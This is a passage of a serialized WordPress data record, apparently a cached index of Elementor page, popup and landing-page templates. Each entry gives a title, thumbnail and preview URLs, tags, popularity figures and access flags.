website\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:625;s:11:\"trend_index\";i:309;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:227;a:16:{s:4:\"tmpl\";i:1209;s:2:\"id\";i:20394;s:5:\"title\";s:30:\"Time Management &#8211; Events\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2021/10/Time-Management-250x280-1.jpg\";s:12:\"tmpl_created\";i:1633884077;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/lp/time-management-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:17:\"[\"Landing Pages\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:228;a:16:{s:4:\"tmpl\";i:1229;s:2:\"id\";i:21118;s:5:\"title\";s:28:\"Contact &#8211; Plants Store\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/12-Contact-Plants-Store.jpg\";s:12:\"tmpl_created\";i:1638802472;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/contact-plants-store/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:40:\"[\"Contact\",\"Info\",\"Plant\",\"Testimonial\"]\";s:10:\"menu_order\";i:15;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:229;a:16:{s:4:\"tmpl\";i:512;s:2:\"id\";i:5525;s:5:\"title\";s:8:\"About 14\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_10.png\";s:12:\"tmpl_created\";i:1520443532;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-14/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:9;s:11:\"trend_index\";i:29;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:230;a:16:{s:4:\"tmpl\";i:893;s:2:\"id\";i:11822;s:5:\"title\";s:30:\"Full Screen | Menu | Portfolio\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2019/09/PopUp_small.png\";s:12:\"tmpl_created\";i:1569429896;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:132:\"https://library.elementor.com/popups/full-screen-menu-portfolio/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:654;s:11:\"trend_index\";i:626;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:231;a:16:{s:4:\"tmpl\";i:1203;s:2:\"id\";i:18591;s:5:\"title\";s:28:\"Coffee Sale &#8211; Business\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280-7.png\";s:12:\"tmpl_created\";i:1633877319;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:122:\"https://library.elementor.com/lp/coffee-sale-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:33:\"[\"Coffee\",\"Landing Pages\",\"Sale\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:20;}i:232;a:16:{s:4:\"tmpl\";i:1231;s:2:\"id\";i:21184;s:5:\"title\";s:28:\"Dental Care &#8211; Services\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/14-Services-Dental-Care.jpg\";s:12:\"tmpl_created\";i:1638807148;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/dental-care-services/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:45:\"[\"Dental\",\"Medical\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:16;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:233;a:16:{s:4:\"tmpl\";i:1064;s:2:\"id\";i:15580;s:5:\"title\";s:31:\"Fullscreen | Menu | Travel Blog\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/11/PopUp-Menu.jpg\";s:12:\"tmpl_created\";i:1606215358;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/fullscreen-menu-travel-blog/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:11:\"full screen\";s:4:\"tags\";s:17:\"[\"Blog\",\"Travel\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:673;s:11:\"trend_index\";i:348;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:234;a:16:{s:4:\"tmpl\";i:1133;s:2:\"id\";i:16645;s:5:\"title\";s:28:\"Headphones &#8211; eCommerce\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2021/01/lp_headphones.png\";s:12:\"tmpl_created\";i:1609944115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/lp/commerce-headphones/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:39:\"[\"Ecommerce\",\"Landing Pages\",\"Product\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:633;s:11:\"trend_index\";i:87;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:235;a:16:{s:4:\"tmpl\";i:1442;s:2:\"id\";i:24584;s:5:\"title\";s:27:\"Wireframe &#8211; Pricing 1\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Pricing-1.jpg\";s:12:\"tmpl_created\";i:1653989152;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-pricing-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:146:\"[\"Booking\",\"Business\",\"Clients\",\"Contact\",\"Faq\",\"Features\",\"Footer\",\"Online Service\",\"Pricing\",\"Products\",\"Professional\",\"Services\",\"Testimonial\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:236;a:16:{s:4:\"tmpl\";i:501;s:2:\"id\";i:5429;s:5:\"title\";s:8:\"About 16\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_4.png\";s:12:\"tmpl_created\";i:1520443510;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-16/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:17;s:16:\"popularity_index\";i:59;s:11:\"trend_index\";i:8;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:237;a:16:{s:4:\"tmpl\";i:1138;s:2:\"id\";i:16762;s:5:\"title\";s:25:\"Conference &#8211; Events\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2021/01/Conference.png\";s:12:\"tmpl_created\";i:1610455119;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/conference-events/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:6:\"Events\";s:4:\"tags\";s:60:\"[\"Conference\",\"Convention\",\"Event\",\"Events\",\"Landing Pages\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:705;s:11:\"trend_index\";i:216;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:238;a:16:{s:4:\"tmpl\";i:1438;s:2:\"id\";i:24539;s:5:\"title\";s:27:\"Wireframe &#8211; Contact 2\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Contact-2.jpg\";s:12:\"tmpl_created\";i:1653989019;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:118:\"https://library.elementor.com/wireframe-contact-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"Business\",\"Contact\",\"Footer\",\"Google Maps\",\"Header\",\"Professional\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:239;a:16:{s:4:\"tmpl\";i:981;s:2:\"id\";i:13281;s:5:\"title\";s:37:\"Hello Bar | Contact | Interior Design\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/04/PopUp.png\";s:12:\"tmpl_created\";i:1586148801;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/hello-bar-contact-interior-design/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:19:\"[\"Interior Design\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:763;s:11:\"trend_index\";i:679;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:240;a:16:{s:4:\"tmpl\";i:505;s:2:\"id\";i:5464;s:5:\"title\";s:8:\"About 17\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_6.png\";s:12:\"tmpl_created\";i:1520443518;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-17/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:18;s:16:\"popularity_index\";i:220;s:11:\"trend_index\";i:142;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:241;a:16:{s:4:\"tmpl\";i:1052;s:2:\"id\";i:15259;s:5:\"title\";s:31:\"Hello Bar | Menu | Psychologist\";s:9:\"thumbnail\";s:71:\"https://library.elementor.com/wp-content/uploads/2020/09/Menu-PopUp.png\";s:12:\"tmpl_created\";i:1600170209;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:133:\"https://library.elementor.com/popups/hello-bar-menu-psychologist/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:9:\"hello bar\";s:4:\"tags\";s:34:\"[\"Psychologist\",\"Psychotherapist\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:739;s:11:\"trend_index\";i:583;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:242;a:16:{s:4:\"tmpl\";i:1434;s:2:\"id\";i:24494;s:5:\"title\";s:28:\"Wireframe &#8211; Services 1\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2022/05/Wireframe-—-Services-1.jpg\";s:12:\"tmpl_created\";i:1653988874;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/wireframe-services-1/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Business\",\"Faq\",\"Footer\",\"Professional\",\"Services\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:243;a:16:{s:4:\"tmpl\";i:1194;s:2:\"id\";i:18701;s:5:\"title\";s:32:\"Digital Course &#8211; eCommerce\";s:9:\"thumbnail\";s:68:\"https://library.elementor.com/wp-content/uploads/2021/04/250x280.jpg\";s:12:\"tmpl_created\";i:1618995134;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/lp/digital-course-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:57:\"[\"Course Online\",\"Ecommerce\",\"Landing Pages\",\"Marketing\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:244;a:16:{s:4:\"tmpl\";i:510;s:2:\"id\";i:5504;s:5:\"title\";s:8:\"About 18\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_9.png\";s:12:\"tmpl_created\";i:1520443528;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-18/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:19;s:16:\"popularity_index\";i:104;s:11:\"trend_index\";i:46;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:245;a:16:{s:4:\"tmpl\";i:1192;s:2:\"id\";i:18612;s:5:\"title\";s:34:\"Bag Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/Library-Pic-Bag-Product.jpeg\";s:12:\"tmpl_created\";i:1618395406;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:128:\"https://library.elementor.com/lp/bag-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:61:\"[\"Bag\",\"Ecommerce\",\"Landing Pages\",\"Product\",\"Sale\",\"Travel\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:875;s:11:\"trend_index\";i:605;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:246;a:16:{s:4:\"tmpl\";i:1227;s:2:\"id\";i:21083;s:5:\"title\";s:26:\"Conference &#8211; Contact\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2021/12/10-Contact-Conference.jpg\";s:12:\"tmpl_created\";i:1638799208;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/conference-contact/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:44:\"[\"Conference\",\"Contact\",\"Form\",\"Info\",\"Map\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:247;a:16:{s:4:\"tmpl\";i:511;s:2:\"id\";i:5515;s:5:\"title\";s:8:\"About 19\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_black_9.png\";s:12:\"tmpl_created\";i:1520443530;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-19/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:20;s:16:\"popularity_index\";i:268;s:11:\"trend_index\";i:161;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:248;a:16:{s:4:\"tmpl\";i:1193;s:2:\"id\";i:18644;s:5:\"title\";s:37:\"Camera Product Sale &#8211; eCommerce\";s:9:\"thumbnail\";s:85:\"https://library.elementor.com/wp-content/uploads/2021/04/camera_sale_featured-img.jpg\";s:12:\"tmpl_created\";i:1618396388;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/lp/camera-product-sale-ecommerce/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:9:\"eCommerce\";s:4:\"tags\";s:59:\"[\"Camera\",\"Ecommerce\",\"Landing Pages\",\"Photography\",\"Sale\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:873;s:11:\"trend_index\";i:535;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:249;a:16:{s:4:\"tmpl\";i:951;s:2:\"id\";i:12736;s:5:\"title\";s:41:\"Slide In | Contact Us | Magazine and Blog\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2020/01/PopUp_contact_s.png\";s:12:\"tmpl_created\";i:1579060978;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:125:\"https://library.elementor.com/popups/slide-in-contact-us/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:19:\"[\"Blog\",\"Magazine\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:734;s:11:\"trend_index\";i:686;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:250;a:16:{s:4:\"tmpl\";i:1222;s:2:\"id\";i:20960;s:5:\"title\";s:26:\"Travel Agency &#8211; Home\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/12/5-Home-Travel-Agency.jpg\";s:12:\"tmpl_created\";i:1638788432;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:117:\"https://library.elementor.com/travel-agency-home/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:53:\"[\"Adventures\",\"Experience\",\"Explore\",\"Travel\",\"Trip\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:251;a:16:{s:4:\"tmpl\";i:506;s:2:\"id\";i:5472;s:5:\"title\";s:7:\"About 2\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_7.png\";s:12:\"tmpl_created\";i:1520443520;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/blocks/about-2/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:21;s:16:\"popularity_index\";i:210;s:11:\"trend_index\";i:116;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:252;a:16:{s:4:\"tmpl\";i:1196;s:2:\"id\";i:18815;s:5:\"title\";s:25:\"Car Wash &#8211; Business\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2021/05/Library-Pic-Car-Wash.png\";s:12:\"tmpl_created\";i:1621336431;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/lp/car-wash-business/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:8:\"Business\";s:4:\"tags\";s:45:\"[\"Business\",\"car\",\"Discount\",\"Landing Pages\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:253;a:16:{s:4:\"tmpl\";i:1242;s:2:\"id\";i:21473;s:5:\"title\";s:40:\"Architecture Photography &#8211; Gallery\";s:9:\"thumbnail\";s:96:\"https://library.elementor.com/wp-content/uploads/2021/12/20-Gallery-Architecture-Photography.jpg\";s:12:\"tmpl_created\";i:1638822115;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:131:\"https://library.elementor.com/architecture-photography-gallery/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:52:\"[\"Architecture\",\"Gallery\",\"Photography\",\"Portfolio\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:254;a:16:{s:4:\"tmpl\";i:1015;s:2:\"id\";i:14067;s:5:\"title\";s:37:\"Slide In | Japanese restaurant | Menu\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2020/06/Menu-Pop-Up-Small.jpg\";s:12:\"tmpl_created\";i:1592290352;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:139:\"https://library.elementor.com/popups/slide-in-japanese-restaurant-menu/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:32:\"[\"Food\",\"Japanese\",\"Restaurant\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:650;s:11:\"trend_index\";i:565;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:255;a:16:{s:4:\"tmpl\";i:504;s:2:\"id\";i:5455;s:5:\"title\";s:8:\"About 20\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_6.png\";s:12:\"tmpl_created\";i:1520443516;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-20/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:22;s:16:\"popularity_index\";i:134;s:11:\"trend_index\";i:70;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:256;a:16:{s:4:\"tmpl\";i:923;s:2:\"id\";i:12229;s:5:\"title\";s:33:\"Slide In | Law Firm | Information\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2019/11/popup.png\";s:12:\"tmpl_created\";i:1572847842;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:135:\"https://library.elementor.com/popups/slide-in-law-firm-information/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:18:\"[\"Law\",\"Law Firm\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:547;s:11:\"trend_index\";i:413;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:257;a:16:{s:4:\"tmpl\";i:1198;s:2:\"id\";i:18824;s:5:\"title\";s:33:\"Design School &#8211; Coming Soon\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2021/05/250x280-1.png\";s:12:\"tmpl_created\";i:1621336756;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:127:\"https://library.elementor.com/lp/design-school-coming-soon/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:2:\"lp\";s:7:\"subtype\";s:16:\"Coming Soon Page\";s:4:\"tags\";s:49:\"[\"Coming Soon\",\"Design\",\"Landing Pages\",\"School\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:258;a:16:{s:4:\"tmpl\";i:1236;s:2:\"id\";i:21259;s:5:\"title\";s:28:\"3D Designer &#8211; Projects\";s:9:\"thumbnail\";s:84:\"https://library.elementor.com/wp-content/uploads/2021/12/24-Projects-3D-Designer.jpg\";s:12:\"tmpl_created\";i:1638819185;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:119:\"https://library.elementor.com/3d-designer-projects/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:69:\"[\"3D\",\"Creative Portfolio\",\"Design\",\"Designer\",\"Portfolio\",\"Project\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:-1;s:11:\"trend_index\";i:-1;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:259;a:16:{s:4:\"tmpl\";i:499;s:2:\"id\";i:5413;s:5:\"title\";s:8:\"About 21\";s:9:\"thumbnail\";s:74:\"https://library.elementor.com/wp-content/uploads/2018/03/about_white_2.png\";s:12:\"tmpl_created\";i:1520443507;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/blocks/about-21/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"block\";s:7:\"subtype\";s:5:\"about\";s:4:\"tags\";s:9:\"[\"About\"]\";s:10:\"menu_order\";i:23;s:16:\"popularity_index\";i:83;s:11:\"trend_index\";i:52;s:17:\"has_page_settings\";s:1:\"0\";s:6:\"is_pro\";s:1:\"0\";s:12:\"access_level\";i:0;}i:260;a:16:{s:4:\"tmpl\";i:1028;s:2:\"id\";i:14827;s:5:\"title\";s:39:\"Slide-In | Contact | Luxury Real Estate\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2020/07/PopUp.png\";s:12:\"tmpl_created\";i:1595323523;s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:141:\"https://library.elementor.com/popups/slide-in-contact-luxury-real-estate/?utm_source=template-library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:28:\"[\"Real estate\",\"Realestate\"]\";s:10:\"menu_order\";i:24;s:16:\"popularity_index\";i:559;s:11:\"trend_index\";i:284;s:17:\"has_page_settings\";s:1:\"1\";s:6:\"is_pro\";s:1:\"1\";s:12:\"access_level\";i:1;}i:261;a:16:{s:4:\"tmpl\";i:1197;s:2:\"id\";i:18819;s:5:\"title\";s:27:\"Dog Walker &#8211; 